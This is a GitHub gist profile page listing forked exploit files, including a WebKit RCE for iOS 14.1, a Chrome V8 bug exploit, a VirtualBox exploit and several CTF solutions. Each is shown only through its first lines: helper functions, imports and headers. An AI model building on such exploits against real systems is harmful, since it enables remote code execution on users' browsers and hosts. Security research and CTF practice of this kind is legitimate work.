😸
writing happy exploits

Duc Phan ducphanduyagentp

@ducphanduyagentp
ducphanduyagentp / fuck.js
Created Sep 6, 2021 — forked from ujin5/fuck.js
WebKit RCE on iOS 14.1
View fuck.js
function sleep( sleepDuration ){
var now = new Date().getTime();
while(new Date().getTime() < now + sleepDuration){ /* do nothing */ }
}
function gc() {
for (let i = 0; i < 0x10; i++) {
new ArrayBuffer(0x1000000);
}
}
let data_view = new DataView(new ArrayBuffer(8));
View poolMetaData.json
{
"name": "MELD 1 TEST",
"description": "MELD 1 TEST POOL",
"ticker": "MELD1",
"homepage": "https://meld.com"
}
View chrome-v8-issue-1126249.js
class Helpers {
constructor() {
this.cvt_buf = new ArrayBuffer(8);
this.cvt_f64a = new Float64Array(this.cvt_buf);
this.cvt_u64a = new BigUint64Array(this.cvt_buf);
this.cvt_u32a = new Uint32Array(this.cvt_buf);
}
ftoi(f) {
View 3_years_of_attacking_javascript_engines.txt
|=-----------------------------------------------------------------------=|
|=-------------=[ 3 Years of Attacking JavaScript Engines ]=-------------=|
|=-----------------------------------------------------------------------=|
|=------------------------------=[ saelo ]=------------------------------=|
|=-----------------------------------------------------------------------=|
The following are some brief notes about the changes that have taken place
since the release of the "Attacking JavaScript Engines" paper [1]. In
general, no big conceptional changes have happened since. Mitigations have
been added to break some of the presented techniques and, as expected, a
View virtualbox_3d_exp.py
# Author : peternguyen93
import sys
sys.path.append('../') # back to vboxlib module
from vboxlib.hgcm import *
from vboxlib.chromium import *
from ctypes import *
'''
@ducphanduyagentp
ducphanduyagentp / exploit.html
Created Jun 24, 2019 — forked from ujin5/exploit.html
Google CTF Quals 2019 Monochromatic
View exploit.html
<html>
<pre id='log'></pre>
<script src="mojo_bindings.js"></script>
<script src="third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script>
<script src="being_creator_interface.mojom.js"></script>
<script src="food_interface.mojom.js"></script>
<script src="dog_interface.mojom.js"></script>
<script src="person_interface.mojom.js"></script>
<script src="cat_interface.mojom.js"></script>
<script>
@ducphanduyagentp
ducphanduyagentp / exp.py
Created May 13, 2019 — forked from hama7230/exp.py
DEF CON CTF Qualifier 2019 speedrun-012
View exp.py
#!/usr/bin/env python
from pwn import *
context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
# context(terminal=['tmux', 'new-window']) # open new window
# libc = ELF('')
elf = ELF('./speedrun-012')
context(os='linux', arch=elf.arch)
context(log_level='debug') # output verbose log
@ducphanduyagentp
ducphanduyagentp / exploit.c
Created Feb 17, 2019 — forked from sampritipanda/exploit.c
Real World CTF - SCSI Driver Exploitation Challenge
View exploit.c
#include <stdint.h>
#include <sys/io.h>
#include <unistd.h>
#include <stdio.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <string.h>
#include <assert.h>
#include "virt_to_phys.c"
@ducphanduyagentp
ducphanduyagentp / pwn.js
Created Jan 10, 2019 — forked from saelo/pwn.js
Exploit for the "roll a d8" challenge of PlaidCTF 2018
View pwn.js
//
// Quick and dirty exploit for the "roll a d8" challenge of PlaidCTF 2018.
// N-day exploit for https://chromium.googlesource.com/v8/v8/+/b5da57a06de8791693c248b7aafc734861a3785d
//
// Scroll down to "BEGIN EXPLOIT" to skip the utility functions.
//
// Copyright (c) 2018 Samuel Groß
//
//
View keybase.md

Keybase proof

I hereby claim:

  • I am ducphanduyagentp on github.
  • I am dphan0x80 (https://keybase.io/dphan0x80) on keybase.
  • I have a public key whose fingerprint is 3796 106E F244 F6C6 EE39 09B3 07A6 7A8D 5C67 96C2

To claim this, I am signing this object: